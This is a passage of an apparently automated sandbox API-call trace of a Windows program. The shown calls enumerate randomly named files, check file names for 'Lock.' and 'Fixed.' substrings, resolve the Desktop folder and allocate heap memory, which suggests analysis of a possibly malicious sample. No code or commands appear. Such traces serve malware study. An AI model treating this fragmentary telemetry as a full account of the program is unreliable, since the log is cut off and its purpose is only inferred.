cAlternateFileName="ACADEM~1.EXE")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xccf87650, ftCreationTime.dwHighDateTime=0x1d4cb04, ftLastAccessTime.dwLowDateTime=0x96e0c9e0, ftLastAccessTime.dwHighDateTime=0x1d4cbaa, ftLastWriteTime.dwLowDateTime=0x96e0c9e0, ftLastWriteTime.dwHighDateTime=0x1d4cbaa, nFileSizeHigh=0x0, nFileSizeLow=0xc6da, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="bY-NIrDXo_nG.bmp", cAlternateFileName="BY-NIR~1.BMP")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x959a8ee0, ftCreationTime.dwHighDateTime=0x1d4d519, ftLastAccessTime.dwLowDateTime=0x51ef5600, ftLastAccessTime.dwHighDateTime=0x1d4d260, ftLastWriteTime.dwLowDateTime=0x51ef5600, ftLastWriteTime.dwHighDateTime=0x1d4d260, nFileSizeHigh=0x0, nFileSizeLow=0xd16c, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="d1NqFAAxwvSf3pfr2yZp.gif", cAlternateFileName="D1NQFA~1.GIF")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1bb180, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x11a, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd27d0d0, ftCreationTime.dwHighDateTime=0x1d4cbfb, ftLastAccessTime.dwLowDateTime=0x5c25220, ftLastAccessTime.dwHighDateTime=0x1d4d04c, ftLastWriteTime.dwLowDateTime=0x5c25220, ftLastWriteTime.dwHighDateTime=0x1d4d04c, nFileSizeHigh=0x0, nFileSizeLow=0x159aa, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="DrmlVcs.bmp", cAlternateFileName="")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x436f1980, ftCreationTime.dwHighDateTime=0x1d4c978, ftLastAccessTime.dwLowDateTime=0x2939a370, ftLastAccessTime.dwHighDateTime=0x1d4cf7a, ftLastWriteTime.dwLowDateTime=0x2939a370, ftLastWriteTime.dwHighDateTime=0x1d4cf7a, nFileSizeHigh=0x0, nFileSizeLow=0xe924, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="eGIW Yzvh.gif", cAlternateFileName="EGIWYZ~1.GIF")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75fbcab0, ftCreationTime.dwHighDateTime=0x1d4caa4, ftLastAccessTime.dwLowDateTime=0xc3226d10, ftLastAccessTime.dwHighDateTime=0x1d4c9d4, ftLastWriteTime.dwLowDateTime=0xc3226d10, ftLastWriteTime.dwHighDateTime=0x1d4c9d4, nFileSizeHigh=0x0, nFileSizeLow=0x20b1, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="FN4XiavIO4PR.bmp", cAlternateFileName="FN4XIA~1.BMP")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58359620, ftCreationTime.dwHighDateTime=0x1d4c93a, ftLastAccessTime.dwLowDateTime=0xd6659fc0, ftLastAccessTime.dwHighDateTime=0x1d4cda1, ftLastWriteTime.dwLowDateTime=0xd6659fc0, ftLastWriteTime.dwHighDateTime=0x1d4cda1, nFileSizeHigh=0x0, nFileSizeLow=0xc4e7, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="GhiVvZ14WbSoIVTo6M.odt", cAlternateFileName="GHIVVZ~1.ODT")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x59f07050, ftCreationTime.dwHighDateTime=0x1d4c62b, ftLastAccessTime.dwLowDateTime=0x8bd0fab0, ftLastAccessTime.dwHighDateTime=0x1d4cdf4, ftLastWriteTime.dwLowDateTime=0x8bd0fab0, ftLastWriteTime.dwHighDateTime=0x1d4cdf4, nFileSizeHigh=0x0, nFileSizeLow=0x802, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="gJ2GDQDH7i.ots", cAlternateFileName="GJ2GDQ~1.OTS")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9846620, ftCreationTime.dwHighDateTime=0x1d4c974, ftLastAccessTime.dwLowDateTime=0xfa86340, ftLastAccessTime.dwHighDateTime=0x1d4d003, ftLastWriteTime.dwLowDateTime=0xfa86340, ftLastWriteTime.dwHighDateTime=0x1d4d003, nFileSizeHigh=0x0, nFileSizeLow=0x5d6d, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="gXTZQTDkC2czFZpWnC.gif", cAlternateFileName="GXTZQT~1.GIF")) returned 1 [0145.418] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9c030, ftCreationTime.dwHighDateTime=0x1d4ccbb, ftLastAccessTime.dwLowDateTime=0x83648e20, ftLastAccessTime.dwHighDateTime=0x1d4cfe6, ftLastWriteTime.dwLowDateTime=0x83648e20, ftLastWriteTime.dwHighDateTime=0x1d4cfe6, nFileSizeHigh=0x0, nFileSizeLow=0x136a0, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="GyHm6iovQDw.m4a", cAlternateFileName="GYHM6I~1.M4A")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x49ad0880, ftCreationTime.dwHighDateTime=0x1d4ccc4, ftLastAccessTime.dwLowDateTime=0xf67e7bc0, ftLastAccessTime.dwHighDateTime=0x1d4d53e, ftLastWriteTime.dwLowDateTime=0xf67e7bc0, ftLastWriteTime.dwHighDateTime=0x1d4d53e, nFileSizeHigh=0x0, nFileSizeLow=0x130fe, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="jrgF.gif", cAlternateFileName="")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8baf2140, ftCreationTime.dwHighDateTime=0x1d4d21a, ftLastAccessTime.dwLowDateTime=0xbf7b9390, ftLastAccessTime.dwHighDateTime=0x1d4cda2, ftLastWriteTime.dwLowDateTime=0xbf7b9390, ftLastWriteTime.dwHighDateTime=0x1d4cda2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="KU9xovkL1lisorTK5X", cAlternateFileName="KU9XOV~1")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b13d2b0, ftCreationTime.dwHighDateTime=0x1d4c6a9, ftLastAccessTime.dwLowDateTime=0xacf087c0, ftLastAccessTime.dwHighDateTime=0x1d4d361, ftLastWriteTime.dwLowDateTime=0xacf087c0, ftLastWriteTime.dwHighDateTime=0x1d4d361, nFileSizeHigh=0x0, nFileSizeLow=0x58b8, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="lorGIZR7_Ai6fNrX6f.xlsx", cAlternateFileName="LORGIZ~1.XLS")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9caadd70, ftCreationTime.dwHighDateTime=0x1d4c5ab, ftLastAccessTime.dwLowDateTime=0x48e7a230, ftLastAccessTime.dwHighDateTime=0x1d4d191, ftLastWriteTime.dwLowDateTime=0x48e7a230, ftLastWriteTime.dwHighDateTime=0x1d4d191, nFileSizeHigh=0x0, nFileSizeLow=0x7acb, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="md6gSAuODLhq.avi", cAlternateFileName="MD6GSA~1.AVI")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc83500, ftCreationTime.dwHighDateTime=0x1d4ce85, ftLastAccessTime.dwLowDateTime=0x243a210, ftLastAccessTime.dwHighDateTime=0x1d4c9fe, ftLastWriteTime.dwLowDateTime=0x243a210, ftLastWriteTime.dwHighDateTime=0x1d4c9fe, nFileSizeHigh=0x0, nFileSizeLow=0x3776, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="nJNF.png", cAlternateFileName="")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8458b1b0, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x42db4f80, ftLastAccessTime.dwHighDateTime=0x1d4d2f0, ftLastWriteTime.dwLowDateTime=0x42db4f80, ftLastWriteTime.dwHighDateTime=0x1d4d2f0, nFileSizeHigh=0x0, nFileSizeLow=0x911e, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="OPOBoXaM2P4A0m.m4a", cAlternateFileName="OPOBOX~1.M4A")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdad68f60, ftCreationTime.dwHighDateTime=0x1d4c978, ftLastAccessTime.dwLowDateTime=0xbd16f080, ftLastAccessTime.dwHighDateTime=0x1d4c7cc, ftLastWriteTime.dwLowDateTime=0xbd16f080, ftLastWriteTime.dwHighDateTime=0x1d4c7cc, nFileSizeHigh=0x0, nFileSizeLow=0x172a0, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="OPqP3gN.pps", cAlternateFileName="")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16325200, ftCreationTime.dwHighDateTime=0x1d4d073, ftLastAccessTime.dwLowDateTime=0xa3a2000, ftLastAccessTime.dwHighDateTime=0x1d4c6c7, ftLastWriteTime.dwLowDateTime=0xa3a2000, ftLastWriteTime.dwHighDateTime=0x1d4c6c7, nFileSizeHigh=0x0, nFileSizeLow=0xad35, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="QHREQz7Xz.jpg", cAlternateFileName="QHREQZ~1.JPG")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6b6db0, ftCreationTime.dwHighDateTime=0x1d4d324, ftLastAccessTime.dwLowDateTime=0xeb9330c0, ftLastAccessTime.dwHighDateTime=0x1d4cca1, ftLastWriteTime.dwLowDateTime=0xeb9330c0, ftLastWriteTime.dwHighDateTime=0x1d4cca1, nFileSizeHigh=0x0, nFileSizeLow=0x178b5, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="QzBYTrrsKyNkrz7Qz2.swf", cAlternateFileName="QZBYTR~1.SWF")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73e8e610, ftCreationTime.dwHighDateTime=0x1d4caed, ftLastAccessTime.dwLowDateTime=0xf1802160, ftLastAccessTime.dwHighDateTime=0x1d4d1e1, ftLastWriteTime.dwLowDateTime=0xf1802160, ftLastWriteTime.dwHighDateTime=0x1d4d1e1, nFileSizeHigh=0x0, nFileSizeLow=0x13415, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="SFHBP1D1LBQEeR.wav", cAlternateFileName="SFHBP1~1.WAV")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea6bb1b0, ftCreationTime.dwHighDateTime=0x1d4d0c8, ftLastAccessTime.dwLowDateTime=0xc696cb50, ftLastAccessTime.dwHighDateTime=0x1d4cc9d, ftLastWriteTime.dwLowDateTime=0xc696cb50, ftLastWriteTime.dwHighDateTime=0x1d4cc9d, nFileSizeHigh=0x0, nFileSizeLow=0x9f34, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="srS5tTxQY.mp3", cAlternateFileName="SRS5TT~1.MP3")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aaf7f30, ftCreationTime.dwHighDateTime=0x1d4c5f8, ftLastAccessTime.dwLowDateTime=0x72f31300, ftLastAccessTime.dwHighDateTime=0x1d4d201, ftLastWriteTime.dwLowDateTime=0x72f31300, ftLastWriteTime.dwHighDateTime=0x1d4d201, nFileSizeHigh=0x0, nFileSizeLow=0x3c59, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="UCS72GVnNBUxEzx.mkv", cAlternateFileName="UCS72G~1.MKV")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea707560, ftCreationTime.dwHighDateTime=0x1d4c740, ftLastAccessTime.dwLowDateTime=0x69275000, ftLastAccessTime.dwHighDateTime=0x1d4ca9c, ftLastWriteTime.dwLowDateTime=0x69275000, ftLastWriteTime.dwHighDateTime=0x1d4ca9c, nFileSizeHigh=0x0, nFileSizeLow=0xd2af, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="wI0b0QZdP-KcsT.avi", cAlternateFileName="WI0B0Q~1.AVI")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc3e13340, ftCreationTime.dwHighDateTime=0x1d4c8a2, ftLastAccessTime.dwLowDateTime=0xb89c1c00, ftLastAccessTime.dwHighDateTime=0x1d4ce49, ftLastWriteTime.dwLowDateTime=0xb89c1c00, ftLastWriteTime.dwHighDateTime=0x1d4ce49, nFileSizeHigh=0x0, nFileSizeLow=0x5d75, dwReserved0=0x24a9cf0, dwReserved1=0x25c6e50, cFileName="YItI7wiYOV-Y.xlsx", cAlternateFileName="YITI7W~1.XLS")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40ab1f10, ftCreationTime.dwHighDateTime=0x1d4d0ed, ftLastAccessTime.dwLowDateTime=0x2ebd11d0, ftLastAccessTime.dwHighDateTime=0x1d4cc80, ftLastWriteTime.dwLowDateTime=0x2ebd11d0, ftLastWriteTime.dwHighDateTime=0x1d4cc80, nFileSizeHigh=0x0, nFileSizeLow=0xbeb2, dwReserved0=0x24a9c78, dwReserved1=0x25c6e50, cFileName="yvFiHqzM6fmTt.flv", cAlternateFileName="YVFIHQ~1.FLV")) returned 1 [0145.419] FindNextFileW (in: hFindFile=0xaa55e0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b16e8, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d650, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x24a9bb8, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\x1205", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0145.419] FindClose (in: hFindFile=0xaa55e0 | out: hFindFile=0xaa55e0) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0AFNgyUK36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFNgyUK36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FNgyUK36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgyUK36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gyUK36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yUK36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UK36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="36kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kK5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HPO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PO1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1.odp", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0AFNgyUK36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AFNgyUK36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="FNgyUK36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NgyUK36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gyUK36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.420] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yUK36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UK36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="36kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kK5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="5YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YHPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HPO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PO1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="O1.odp", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0145.421] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0145.421] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9a68 [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0145.421] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ab0 [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0145.421] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8bf3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x0 [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0145.421] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416f30 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x100) returned 0x2416f30 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0145.422] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b10b8 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0145.422] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0145.423] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b13c8 | out: hHeap=0x25c0000) returned 1 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0145.423] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0145.423] CharUpperBuffW (in: 